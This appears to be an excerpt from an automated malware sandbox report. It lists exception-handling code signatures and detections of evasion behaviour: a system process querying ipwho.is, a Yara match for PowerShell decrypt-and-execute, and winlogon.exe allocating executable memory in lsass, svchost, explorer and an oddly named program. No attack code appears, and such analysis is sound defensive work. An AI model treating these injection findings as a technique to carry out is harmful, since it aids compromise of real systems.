        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000016588BCDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000016588BC9490
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0000016588BC97F4
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D3497F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000017A8D3497F4
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D349490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000017A8D349490
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000017A8D34DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001F34D8BDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001F34D8B9490
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001F34D8B97F4
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C2709490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000220C2709490
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000220C270DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C27097F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00000220C27097F4
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E99490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025AF1E99490
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0000025AF1E997F4
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025AF1E9DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0000027BFFD3DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD39490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0000027BFFD39490
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD397F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0000027BFFD397F4
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE0599490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CEE0599490
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CEE059DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE05997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001CEE05997F4
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001B12B39DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B3997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_000001B12B3997F4
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B399490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001B12B399490

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\svchost.exeDomain query: ipwho.is
        Source: C:\Windows\System32\svchost.exeDomain query: c.pki.goog
        Yara detected Powershell decrypt and execute
        Source: Yara matchFile source: amsi64_3316.amsi.csv, type: OTHER
        Allocates memory in foreign processes
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2158AEB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E89FDC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1F088910000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AC86F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14785F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DC59CE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16588B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17A8CDB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F34D880000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 220C26D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25AF1E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27BFF5C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CEE0560000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B12B360000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D16AC90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 244678A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 183B0DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1805B940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 191051C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BD35360000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C3D9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12411140000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D66E190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25F19560000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BCA63A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E8FB3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F30F940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19CDA5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A5F41B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27B14120000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BCB8350000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17A379A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 250F1D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23B351A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA9F190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D56C5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E5CF260000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B558CB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17A21740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20FA22F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD4E000000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\sihost.exe base: 17B78700000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EB7B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 210A8A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B28DE00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 157ABEB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 25BB8540000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E697F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\explorer.exe base: 7F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15C57B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B9EF760000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 24C894C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21F961C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 2436BB30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 172339F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26FA2F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F8FBBC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E3C3A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 20E40470000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000 protect: page execute and read and writeJump to behavior
